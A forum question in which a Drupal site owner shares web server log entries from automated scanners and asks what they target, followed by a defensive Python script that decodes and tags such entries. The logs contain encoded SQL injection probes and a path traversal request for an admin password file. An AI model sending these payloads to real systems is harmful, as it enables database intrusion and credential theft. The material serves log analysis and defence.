What are they trying to do with these requests out of Microsoft network?

by Max57   Last Updated April 16, 2018 10:07 AM

While checking the server logs for one of my D7 websites I found these entries:

52.224.70.96 - - [08/Apr/2018:17:12:51 +0200] "POST /?q=user/login HTTP/1.0" 301 253 "-" "Ruby"

52.224.51.136 - - [08/Apr/2018:17:12:51 +0200] "GET /?f=search&m=index&keyword=aaa%2527%256F%2572%2520%2575%2570%2564%2561%2574%2565%2578%256D%256C%2528%2531%252C%2563%256F%256E%2563%2561%2574%2528%2531%252C%256D%2564%2535%2528%2531%2529%2529%252C%2531%2529%2523 HTTP/1.0" 301 457 "-" "Ruby"

52.234.224.191 - - [08/Apr/2018:17:12:51 +0200] "GET //?f=search&m=index&keyword=aaa%2527%256F%2572%2520%2575%2570%2564%2561%2574%2565%2578%256D%256C%2528%2531%252C%2563%256F%256E%2563%2561%2574%2528%2531%252C%256D%2564%2535%2528%2531%2529%2529%252C%2531%2529%2523 HTTP/1.0" 200 7275 "-" "Ruby"

52.234.224.191 - - [08/Apr/2018:17:12:52 +0200] "GET /zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php HTTP/1.0" 301 298 "-" "Ruby"

52.226.71.1 - - [08/Apr/2018:17:12:52 +0200] "GET /opac/search_rss.php?location=ALL%27%20UNION%20ALL%20SELECT%20CHR(113)%7C%7CCHR(118)%7C%7CCHR(112)%7C%7CCHR(122)%7C%7CCHR(113)%7C%7CCHR(100)%7C%7CCHR(108)%7C%7CCHR(98)%7C%7CCHR(104)%7C%7CCHR(120)%7C%7CCHR(71)%7C%7CCHR(112)%7C%7CCHR(105)%7C%7CCHR(108)%7C%7CCHR(81)%7C%7CCHR(113)%7C%7CCHR(122)%7C%7CCHR(120)%7C%7CCHR(113)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&title=ccc&doctype=ALL&lang_code=ALL&match_flag=forward&displaypg=20&showmode=list&orderby=DESC&sort=CATA_DATE&onlylendable=yes&with_ebook=&with_ebook= HTTP/1.0" 301 826 "-" "Ruby"

13.72.105.97 - - [08/Apr/2018:17:12:52 +0200] "GET //opac/search_rss.php?location=ALL%27%20UNION%20ALL%20SELECT%20CHR(113)%7C%7CCHR(118)%7C%7CCHR(112)%7C%7CCHR(122)%7C%7CCHR(113)%7C%7CCHR(100)%7C%7CCHR(108)%7C%7CCHR(98)%7C%7CCHR(104)%7C%7CCHR(120)%7C%7CCHR(71)%7C%7CCHR(112)%7C%7CCHR(105)%7C%7CCHR(108)%7C%7CCHR(81)%7C%7CCHR(113)%7C%7CCHR(122)%7C%7CCHR(120)%7C%7CCHR(113)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&title=ccc&doctype=ALL&lang_code=ALL&match_flag=forward&displaypg=20&showmode=list&orderby=DESC&sort=CATA_DATE&onlylendable=yes&with_ebook=&with_ebook= HTTP/1.0" 404 6093 "-" "Ruby"

52.226.73.161 - - [08/Apr/2018:17:12:52 +0200] "GET //zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php HTTP/1.0" 404 5841 "-" "Ruby"


Any idea what those requests are trying to obtain in Drupal?

Thanks

Max

Tags : security
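
One way to read entries like these from the defender's side, added here as an example and not part of the original post: parse each line, percent-decode the request target until it stops changing (the `%25xx` sequences are a second encoding layer), and tag what the decoded text contains. The marker patterns, function names and output fields are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Apache combined log format, as used by the entries in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

# Heuristic markers chosen for this example (an assumption, not exhaustive).
MARKERS = {
    "sql_injection": re.compile(r"union\s+(all\s+)?select|updatexml\s*\(|'\s*or\s", re.I),
    "path_traversal": re.compile(r"\.\./"),
}

def fully_decode(value, max_rounds=5):
    """Percent-decode until the string stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def triage(line):
    """Parse one log line; return decoded target, encoding depth and tags."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None  # not in combined log format
    decoded, rounds = fully_decode(m["target"])
    tags = sorted(name for name, rx in MARKERS.items() if rx.search(decoded))
    return {"ip": m["ip"], "status": int(m["status"]), "agent": m["agent"],
            "decoded": decoded, "encoding_layers": rounds, "tags": tags}

# Three entries copied from the post (long payload split across string literals).
SAMPLE_LINES = [
    '52.224.70.96 - - [08/Apr/2018:17:12:51 +0200] "POST /?q=user/login HTTP/1.0" 301 253 "-" "Ruby"',
    '52.224.51.136 - - [08/Apr/2018:17:12:51 +0200] "GET /?f=search&m=index&keyword=aaa'
    '%2527%256F%2572%2520%2575%2570%2564%2561%2574%2565%2578%256D%256C%2528%2531%252C'
    '%2563%256F%256E%2563%2561%2574%2528%2531%252C%256D%2564%2535%2528%2531%2529%2529'
    '%252C%2531%2529%2523 HTTP/1.0" 301 457 "-" "Ruby"',
    '52.234.224.191 - - [08/Apr/2018:17:12:52 +0200] "GET /zplug/ajax_asyn_link.old.php'
    '?url=../admin/opacadminpwd.php HTTP/1.0" 301 298 "-" "Ruby"',
]

if __name__ == "__main__":
    for e in map(triage, SAMPLE_LINES):
        print(e["ip"], e["status"], e["encoding_layers"], e["tags"], e["decoded"])
```

The status column matters as much as the tags: a 301 or 404 means the probe was redirected or found nothing, while a 200 only says some page was served and is worth checking against what that URL returns on the site.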

